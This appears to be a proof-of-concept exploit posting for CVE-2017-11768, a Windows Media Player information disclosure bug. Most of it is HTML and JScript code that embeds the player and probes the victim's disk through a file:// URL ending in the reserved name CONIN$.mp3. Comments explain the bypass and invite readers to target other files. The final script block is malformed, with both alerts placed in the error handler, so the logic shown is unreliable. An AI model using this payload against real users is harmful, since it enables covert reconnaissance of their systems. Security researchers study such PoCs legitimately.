Windows Media Player Information Disclosure

Windows Media Player suffers from an information disclosure vulnerability that lets an attacker know if a file exists.

MD5 | 90ec3cbec78508be086c6e10403ca97a

CVE-2017-11768 PoC code:

<b>existing file:</b>

<!-- "existing file:" with a bold tag to present a Windows Media Player mp3
file is going to test for the presence of files on disk, in our case we are
detecting cmd.exe binary in system32 folder. -->


<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">

<!-- Instantiating Specific class id - Windows Media Player HTMLView CLSID
"6BF52A52-394A-11d3-B153-00C04F79FAA6" to embed Windows Media Player. -->

<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">

<!-- Testing for the presence of files on disk via param.url. I added
"CONIN$.mp3" at the end of VALUE for valid detection, otherwise you'll get
prompt that says "doesn't match the file format". CONIN$ is a console input
device, the parameter of well known Windows function CreateFile. CONIN$ is
reserved name on Windows which mean it's invalid mp3 file name thus
bypasses prompt that checks extension. You can change param.url to your
desired file/folder to detect. -->

<param name="captioningID" value="displaylyric" />

<PARAM NAME="autoStart" VALUE="-1">


<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>

alert('File not detected.');
alert('File detected!');

Related Posts